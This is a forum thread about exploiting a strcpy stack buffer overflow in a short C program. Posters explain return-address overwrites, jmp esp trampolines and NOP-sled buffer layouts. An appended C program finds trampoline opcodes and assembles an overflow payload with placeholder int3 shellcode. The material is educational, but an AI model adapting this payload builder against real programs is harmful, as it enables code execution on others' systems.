Author | Post
beetleflux

    #include <string.h>

    int main(int argc, char **argv)
    {
        char buf[256];
        if (argc < 2)
            return 1;              /* no argument given, nothing to copy */
        strcpy(buf, argv[1]);      /* no length check: an argument longer than 255 bytes overflows buf */
        return 0;
    }

This code is vulnerable to buffer overflow. I'm trying to learn about exploiting this kind of code, so I know it's common to make it spawn a shell, but what would I input if I wanted to make the program print out "hello world"? Is it A*256 cout<<"hello world"? I know I have to overwrite the memory and such, but I don't know the details. Can someone explain to me how and why it is possible to exploit the code above?

03.06.2006 16:37:17
belo

Well, the point of the buffer overflow is to overwrite the return address in the stack. The return address is used when the function returns and is the address of the next instruction to execute in the calling function. But if you change the value of the return address, you can execute any code you want (granted you have enough room to store it). Basically, you fill the buffer with your shellcode (which is only executable code, compiled asm if you want (if I'm not mistaken)), then you add some padding to overwrite what you don't want and then you finally replace the return address so that it points to the code in the buffer. The only thing I don't get is: how can you know the correct address to use for the return address?

03.06.2006 17:24:08
theblacksheep

If you write local exploits you can often use the environment to store your shellcode. Newer kernels use some randomization, but in older ones you can calculate the exact address. The second method is to use the buffer you overwrite for storing your shellcode. Then you have to guess a little bit where exactly it is located. tbs

PS: Usually the first thing you do is write a "Hello World" program, but you should start your exploiting career with spawning a shell.

Edited by theblacksheep on 03.06.2006 18:41:56
03.06.2006 18:39:03
|||
miStycaL [none yet]

Hi. In a Windows OS, you can try to put some junk until you reach EIP: debug your vulnerable program with Olly and start putting A's until you fill EIP with A's. Then you will need two things, a shellcode and a return address. In Windows, you can't use a static address in your stack. To make your exploit more 'stable' you will need to jump (return) to a location first and then jump to the stack. You can use an opcode jmp esp, call esp, or push esp; ret for it. You can use the address of one of these opcodes; I suggest you use the address of one that is located in a very common DLL, like kernel32, user32, msvcrt, or inside your vulnerable program. You can use some software to search for this opcode; you can use SAC, and if you don't want to use SAC you can use my own opcode finder. If you want, send me a PM. ADMIN, if you can put it in the bright-shadows download section I will be a happy girl.

Then your buffer layout will look like:

    <junk> <EIP> <Some NOPs> <Here you will be happy>
    aaaaaaaaaaaaaaaaaaaaaaaaaa[Jmp esp]\x90\x90\x90\x90\x90\x90\x90[Shellcode]

Then make a program that builds this buffer and sends the buffer to the program. I hope it helps you.

04.06.2006 04:05:57
|||
DevAstatoR

Try the book "Forbidden Code" by Jon Erickson.

14.09.2006 10:36:44
|||
unknown user

Yeah, this really is a larger topic than we could cover in a forum thread... To find opcodes on a Linux box, which might also be the case, you could use this command:

    objdump -d /bin/* | grep -i [mnemonic]

It's quick and dirty, just the way I like it.

17.09.2006 01:32:44
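As an added example (not code from the thread or from any of its posters), the following C program works through the two steps miStycaL's and the last post describe: it scans a constructed byte image for the jmp esp / call esp / push esp; ret opcodes (the same search the objdump command does on mnemonics, done here on raw bytes), then builds the <junk><EIP><NOPs><shellcode> layout with the return address stored little-endian, and finally checks the result for NUL bytes, because strcpy() and argv stop at the first 0x00. The image bytes, the 0x7C811234 module base, the 260-byte distance from the buffer to EIP and the int3 placeholder shellcode are all constructed assumptions, not values taken from any real binary or from the program in the first post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The x86-32 "trampoline" opcodes named in the thread: a return address that
   lands on one of these transfers control to wherever ESP points, i.e. into
   the NOP sled that follows the overwritten EIP on the stack. */
static const unsigned char OP_JMP_ESP[]      = { 0xFF, 0xE4 };   /* jmp esp       */
static const unsigned char OP_CALL_ESP[]     = { 0xFF, 0xD4 };   /* call esp      */
static const unsigned char OP_PUSH_ESP_RET[] = { 0x54, 0xC3 };   /* push esp; ret */

/* Constructed stand-in for a loaded module's code bytes (not a real DLL):
   a jmp esp sits at offset 7 and a push esp; ret at offset 10. */
static const unsigned char SAMPLE_IMAGE[] = {
    0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x5D, 0xC3,   /* push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret */
    0xFF, 0xE4,                                 /* jmp esp        (offset 7)  */
    0x90,                                       /* nop                        */
    0x54, 0xC3                                  /* push esp; ret  (offset 10) */
};

/* Placeholder "shellcode" (four int3 instructions); real shellcode would go here. */
static const unsigned char SAMPLE_SHELLCODE[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Scan image[0..len) for a byte pattern; returns the offset of the first hit,
   or -1. This is the objdump -d | grep search done on raw bytes. */
long find_opcode(const unsigned char *image, size_t len,
                 const unsigned char *pat, size_t patlen)
{
    if (patlen == 0 || len < patlen)
        return -1;
    for (size_t i = 0; i + patlen <= len; i++)
        if (memcmp(image + i, pat, patlen) == 0)
            return (long)i;
    return -1;
}

/* Lay out <junk><EIP><NOPs><shellcode> in out[]. offset_to_eip is the number
   of bytes between the start of the vulnerable buffer and the saved return
   address, found in the debugger as the post describes. ret_addr is stored
   little-endian, the byte order a 32-bit x86 reads it from the stack.
   Returns the payload length, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t outcap,
                     size_t offset_to_eip, uint32_t ret_addr, size_t nops,
                     const unsigned char *shellcode, size_t sclen)
{
    size_t total = offset_to_eip + 4 + nops + sclen;
    if (total > outcap)
        return 0;
    memset(out, 'A', offset_to_eip);                    /* junk up to EIP */
    out[offset_to_eip + 0] = (unsigned char)(ret_addr & 0xFF);
    out[offset_to_eip + 1] = (unsigned char)((ret_addr >> 8) & 0xFF);
    out[offset_to_eip + 2] = (unsigned char)((ret_addr >> 16) & 0xFF);
    out[offset_to_eip + 3] = (unsigned char)((ret_addr >> 24) & 0xFF);
    memset(out + offset_to_eip + 4, 0x90, nops);        /* NOP sled       */
    memcpy(out + offset_to_eip + 4 + nops, shellcode, sclen);
    return total;
}

/* strcpy() (and argv[]) stop at the first NUL byte, so a payload delivered that
   way must contain none: a return address or shellcode with a 0x00 byte gets
   truncated. Returns the index of the first NUL, or -1 if the payload is clean. */
long first_nul(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0x00)
            return (long)i;
    return -1;
}

int main(void)
{
    /* Assumed load address of the constructed module; a real one must be read
       off the target process in the debugger. */
    const uint32_t image_base = 0x7C811234U;
    unsigned char payload[512];

    long off = find_opcode(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, OP_JMP_ESP, sizeof OP_JMP_ESP);
    if (off < 0) {
        puts("no jmp esp in image");
        return 1;
    }
    uint32_t ret = image_base + (uint32_t)off;

    /* 260 is an assumed distance from the buffer to EIP, not measured from the thread's program. */
    size_t n = build_payload(payload, sizeof payload, 260, ret, 8,
                             SAMPLE_SHELLCODE, sizeof SAMPLE_SHELLCODE);
    printf("jmp esp at image offset %ld -> return address 0x%08X\n", off, ret);
    printf("payload length %zu, first NUL at %ld (-1 = clean)\n", n, first_nul(payload, n));
    return 0;
}
```

The NUL check is what rules out a return address in the executable's own image when that image is mapped low: an address such as 0x00401234 encodes as 34 12 40 00, and strcpy() would stop copying at that fourth byte, which is one reason the post points at a DLL address instead. Only the bytes up to the first NUL reach the stack, so run the check before sending anything.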